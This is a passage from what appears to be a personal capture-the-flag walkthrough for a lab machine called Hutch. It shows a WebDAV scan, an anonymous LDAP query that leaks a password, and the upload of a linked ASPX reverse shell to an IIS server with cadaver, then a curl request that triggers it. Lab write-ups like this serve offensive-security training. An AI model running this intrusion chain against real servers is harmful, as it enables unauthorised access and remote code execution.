Foothold

| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Fri, 25 Oct 2024 18:27:24 GMT
|   Server Type: Microsoft-IIS/10.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK

❯ davtest -sendbd auto -url http://192.168.209.122
********************************************************
 Testing DAV connection
OPEN            FAIL:   http://192.168.209.122  Unauthorized. Basic realm="192.168.209.122"

Need creds

 ❯ ldapsearch -H ldap://hutchdc.hutch.offsec -D '' -w '' -b "dc=hutch,dc=offsec"

fmcsorley:CrabSharkJellyfish192

https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx

❯ cadaver 192.168.209.122
Authentication required for 192.168.209.122 on server `192.168.209.122':
Username: fmcsorley
Password:
dav:/> put pwned.aspx
Uploading pwned.aspx to `/pwned.aspx':
Progress: [=============================>] 100.0% of 15550 bytes succeeded.

❯ curl http://hutch.offsec/pwned.aspx]

Previous389, 88 NextPriv Esc

Last updated 10 months ago